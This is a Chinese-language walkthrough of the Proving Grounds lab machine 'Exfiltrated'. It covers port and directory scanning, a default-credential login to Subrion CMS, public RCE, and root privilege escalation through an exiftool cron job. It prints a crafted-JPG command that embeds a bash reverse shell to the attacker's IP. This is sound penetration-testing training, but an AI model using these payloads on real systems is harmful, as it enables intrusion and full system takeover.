前言
在未来将会持续更新Proving Grounds Practice内的靶机Write Up,近期本人也通过了OSCP考试,所以将打靶的所有笔记共享出来,所有的靶机推荐来源于以下链接: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159
不过其中有一些机器已经不在Proving Grounds Practice中了,所以就没有了Write Up,本系列将有大约40台左右的机器,如果你在练习过程中遇到了困难,建议先自己进行挖掘,然后再查看Write Up,始终需要记得:Try Harder。
本文结构
一般来说本系列的Write Up将以以下的结构来进行
-
端口扫描 -
网页枚举或端口枚举 -
突破入口 -
特权提升
端口扫描
$ nmap -r -v --min-rate=1500 -p- -oN 001-nmap-tcp-full 192.168.183.16
Not shown: 65527 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
针对性枚举
当访问 192.168.183.163 的时候会自动重定向去 exfiltrated.offsec , 所以把 exfiltrated.offsec 添加到/etc/hosts里面去.
网页目录枚举
┌──(aaron㉿aacai)-[~/Desktop/pg/Exfiltrated]
└─$ dirsearch -u "http://exfiltrated.offsec" -x 404
[07:49:14] Starting:
[07:49:20] 200 - 76B - /.angular-cli.json
[07:49:21] 200 - 104B - /.apport-ignore.xml
...
[07:49:53] 200 - 104B - /WEB-INF/application-client.xml
...
[07:51:15] 200 - 142B - /robots.txt
...
robots.txt 文件泄露了,查看此文件中的内容,可以看到几个目录。
尝试访问每个路径,当让问到 /panel, 显示了 Subrion CMS v4.2.1, 使用admin:admin来尝试登录
默认的账号密码可以直接登录到后台,在Google当中搜索相关的漏洞,第一个结果显示有一个RCE在这个版本.
尝试利用这个脚本。
能够成功利用,使用python来反弹shell。
然后得到shell。
权限提升
信息收集
基本信息
计划任务
有用的软件
查看计划任务脚本内的内容
www-data@exfiltrated:/tmp$ cat /opt/image-exif.sh
cat /opt/image-exif.sh
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne "\n metadata directory cleaned! \n\n"
IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"
echo -ne "\n Processing EXIF metadata now... \n\n"
ls $IMAGES | grep "jpg" | while read filename;
do
exiftool "$IMAGES/$filename" >> $LOGFILE
done
echo -ne "\n\n Processing is finished! \n\n\n"
使用JPG_RCE脚本去生成一个用于反弹shell的jpg
(https://github.com/OneSecCyber/JPEG_RCE)
┌──(aaron㉿aacai)-[~/Desktop/pg/Exfiltrated]
└─$ git clone https://github.com/OneSecCyber/JPEG_RCE.git
┌──(aaron㉿aacai)-[~/Desktop/pg/Exfiltrated]
└─$ cd JPEG_RCE
┌──(aaron㉿aacai)-[~/Desktop/pg/Exfiltrated/JPEG_RCE]
└─$ ls
eval.config POC.mp4 README.md runme.jpg
┌──(aaron㉿aacai)-[~/Desktop/pg/Exfiltrated/JPEG_RCE]
└─$ mousepad eval.config
┌──(aaron㉿aacai)-[~/Desktop/pg/Exfiltrated/JPEG_RCE]
└─$ exiftool -config eval.config runme.jpg -eval='system("bash -c "bash -i >& /dev/tcp/192.168.45.166/80 0>&1"")'
1 image files updated
┌──(aaron㉿aacai)-[~/Desktop/pg/Exfiltrated/JPEG_RCE]
└─$ ls
eval.config POC.mp4 README.md runme.jpg runme.jpg_original然后上传jpg文件到 http://exfiltrated.offsec/panel/uploads/#elf_l1_Lw
等待反弹shell,最终得到root的shell
END
OSCP(Offensive Security Certified Professional),中文称国际注册渗透测试专家认证,是由Offensive Security推出的200等级的证书,主要面向领域:渗透测试。
OSCP 证书是一种技术性证书,涵盖渗透测试和攻击技术方面。持有此证书的人员已通过对目标网络进行渗透测试并获得管理员访问权限的实际考试。该证书是由 Offense Security 出品,考试内容涉及网络渗透测试、漏洞挖掘、漏洞利用等方面。OSCP 考试难度较高,需要实际的技能和经验,持有此证书可证明持有人具有深入了解渗透测试及相关攻击技术的实际能力。
如果你觉得本篇文章对你有帮助,点个关注好不好呢,还可以点个在看,感谢你的支持:)))))))))))))
联系我
WeChat ID:wengchensmile
Email Address: [email protected](个人)
原文始发于微信公众号(Aaron与安全的那些事):Proving Grounds Practice-Exfiltrated
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论